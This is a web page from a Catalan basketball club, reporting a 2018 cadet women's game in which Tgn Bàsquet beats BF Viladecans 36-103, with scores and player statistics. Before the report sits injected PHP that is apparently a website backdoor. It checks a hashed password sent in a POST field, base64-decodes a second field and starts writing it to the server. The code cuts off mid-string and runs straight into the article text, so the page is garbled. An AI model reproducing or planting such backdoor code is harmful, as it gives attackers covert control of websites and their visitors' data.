function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El cadet femení 04 A surt de forma imparable al partit i derrota el BF Viladecans (36-103) - Tgn Bàsquet Club -

El cadet femení 04 A surt de forma imparable al partit i derrota el BF Viladecans (36-103)

Updated: desembre 4, 2018

L’equip cadet femení 04 A va demostrar ser molt superior al BF Viladecans en un partit que va sentenciar abans del descans. El conjunt que entrena Albert del Rey va encaixar una cistella local només començar el matx però va reaccionar amb tres triples seguits (9 en tot el partit) i va encarrilar un enfrontament que va dominar amb autoritat. Així, el resultat era de 6-25 després del primer quart i de 20-60 al descans. La bona defensa i el criteri encertat a l’hora de moure la pilota en atac van ser armes que les locals no van poder contrarestar.

BF VILADECANS     36

TGN BÀSQUET      103

BF VILADECANS: Álvarez (1), Camps, Garcia (18), Camacho (2), Canteria (5) -cinc inicial- Ortega, Arcos, España (2), Ballet (2), Molina (1), Flores. Tirs lliures 2/7. Faltes: 34. Eliminada: Camacho, minut 34.

TGN BÀSQUET: Jiménez (14), Ciurana (20), Adserias (17), Fernández (9), Torruella (28) -cinc inicial- Cabré, Barreira (7), Barrero (6), Martínez (2). Triples 9: Jiménez (3), Ciurana i Torruella (2), Fernández i Barreira. Tirs lliures: 30/46. Faltes: 12.

Parcials: 6-25, 14-35, 6-19 i 10-24.

Àrbitres: Esteban i Pérez.